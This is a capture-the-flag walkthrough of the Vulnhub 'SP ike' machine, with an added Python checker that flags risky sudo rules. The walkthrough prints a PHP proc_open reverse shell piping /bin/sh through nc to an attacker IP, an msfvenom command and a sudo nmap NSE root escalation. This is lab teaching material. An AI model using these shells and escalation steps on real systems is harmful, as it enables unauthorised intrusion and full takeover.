
SP ike: Vulnhub Lab Walkthrough

Hello friends! Today we are going to take on another CTF challenge known as “SP ike”. The credit for making this VM goes to “Daniel Solstad”. Our goal is to get the flags to complete the challenge.

Security Level: Intermediate

Penetrating Methodology:

  • Discovering Target’s IP
  • Network scanning (Nmap)
  • Surfing HTTP service port
  • Configuring HEXCHAT IRC Client
  • Connecting to IRC Server
  • Creating PHP Malicious Script using MSFvenom
  • Using Netcat Listener
  • Spawning TTY Shell
  • Getting Root Access
  • Reading Final Flag

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

We found our target –> 192.168.1.21

Time to scan the Target’s IP with nmap. Nmap scan result shows FOUR open ports, 80(http), 139(NetBIOS-ssn), 445(NetBIOS-ssn), 6667(IRC).

nmap -sV -T4 192.168.1.21

Since port 80 is running HTTP, we browsed to the target’s IP in our browser, but it was not of much help. Moving on.

Even directory scanning with the dirb tool was not very useful. That left us with the IRC chat server on port 6667, so we used the IRC client Hexchat to connect to it. First, we need to configure Hexchat by adding a new profile and editing its connection details.

Now edit the network “ike” which we have added and give it the target’s IP.

We have successfully connected to the IRC server, and we found something interesting: the server has a channel #php which has a phpbot. I guess it wouldn’t be a problem for the phpbot to execute a PHP script.

We created a msfvenom script to exploit the target machine. We used the reverse_netcat payload to create this script.

msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.34 lport=1234 R

After a few tries, we were finally able to execute our PHP script successfully. To get a reverse shell, execute the script given below.

!php $s=array(); $p=array(); proc_open("mkfifo /tmp/tsglu; nc 192.168.1.34 1234 0</tmp/tsglu | /bin/sh >/tmp/tsglu 2>&1; rm /tmp/tsglu", $s, $p);

Oh Yeah!! We got the reverse shell, but it is not a proper shell, so we will spawn a TTY shell using python.

After running sudo -l, we saw that nmap can be run with root privileges. So to get root, we used the commands given below and successfully got root access. Time to read the FLAG!!

nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
echo "os.execute('/bin/sh')" > /tmp/shell.nse
sudo nmap --script=/tmp/shell.nse
id
cd /root
ls
cat flag.txt
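
The root step above works because a sudo rule for nmap lets the caller run an NSE (Lua) script as root. As an added example (not part of the original walkthrough), the check below parses `sudo -l` output and reports root rules for programs that execute caller-supplied code. The list beyond nmap is a generalization, and the sample listing and the account name `svc` are constructed.

```python
import os
import re

# Programs that run caller-supplied code, so a root sudo rule for them is a root
# shell. nmap is this page's case (an NSE script is Lua and may call os.execute);
# the remaining names are an added generalization, not from the walkthrough.
SCRIPTABLE = {"nmap", "vi", "vim", "less", "find", "awk", "env", "tar",
              "bash", "sh", "python", "python3", "perl", "ruby", "lua", "php"}

# One rule line of `sudo -l` output: "(runas) [TAG: ...] cmd[, cmd ...]"
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def audit_sudo_listing(text):
    """Return (path, nopasswd, args_pinned) for each risky rule that runs as root."""
    findings = []
    for line in text.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header, Defaults line or blank
        runas_user = m.group("runas").split(":")[0].strip()
        if runas_user not in ("root", "ALL"):
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in re.split(r"(?<!\\),\s*", m.group("cmds").strip()):
            parts = cmd.split()
            if not parts:
                continue
            path, args = parts[0], parts[1:]
            if path == "ALL" or os.path.basename(path) in SCRIPTABLE:
                # Pinned arguments narrow the rule; a wildcard un-pins them.
                pinned = bool(args) and not any("*" in a or "?" in a for a in args)
                findings.append((path, nopasswd, pinned))
    return findings

# Constructed sample; the account name "svc" is a placeholder.
SAMPLE = """\
User svc may run the following commands on this host:
    (root) NOPASSWD: /usr/bin/nmap
    (root) /usr/bin/systemctl status nginx, /usr/bin/find /var/log -name *.log
    (root) /usr/bin/less /var/log/syslog
    (backup) NOPASSWD: /usr/bin/python3
"""

if __name__ == "__main__":
    for path, nopasswd, pinned in audit_sudo_listing(SAMPLE):
        print(f"{path}: nopasswd={nopasswd} args_pinned={pinned}")
```

A rule reported with pinned arguments still needs review, since pagers and editors can start a shell interactively whatever file they were opened on.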

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. He has 2 years of experience in the field of security as a Penetration Tester and Forensic Computer Analyst.